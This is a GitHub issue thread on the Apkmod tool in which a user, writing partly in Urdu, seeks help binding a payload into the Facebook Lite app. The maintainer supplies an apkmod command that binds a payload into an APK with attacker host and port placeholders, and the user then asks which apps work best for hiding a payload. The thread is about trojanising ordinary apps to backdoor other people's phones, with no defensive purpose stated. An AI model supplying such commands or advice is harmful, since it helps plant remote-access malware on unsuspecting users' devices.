### ISSUE TITLE
Yay problem kesy solve ho ge

### ISSUE THREAD

**Issue by hafizaliusama** [Hax4us/Apkmod#47]
![IMG-20200513-WA0038](https://user-images.githubusercontent.com/58119673/82132375-970b3880-97f8-11ea-89c1-72d5b6ef39c1.jpg)

**Problem description**
A clear and concise description of what the problem is. You may post screenshots in addition to description.

**Steps to reproduce**
Steps to reproduce the behavior. Please post all necessary commands that are needed to reproduce the issue.

**Expected behavior**

**Additional information**
1. Post output of command `termux-info`
2. Post version `apkmod -v`
3. Attach Original __Apk__ file.

**Comment by Hax4us** [comment]
Use option `-a` along with `-b` for example
`apkmod -a -b yourapp.apk -o bindapp.apk lhost=?  lport=?`

**Comment by hafizaliusama** [comment]
Asa b kia par  kuch ni huwa bhai jan

**Comment by Hax4us** [comment]
What's name of application in which you are trying to bind payload

**Comment by hafizaliusama** [comment]
Lite facebook

**Comment by hafizaliusama** [comment]
I am trying to inject payload with litefacebook apk file ..

**Comment by Hax4us** [comment]
No you can not bind with fblite.

**Comment by hafizaliusama** [comment]
Which application is better for binding payload
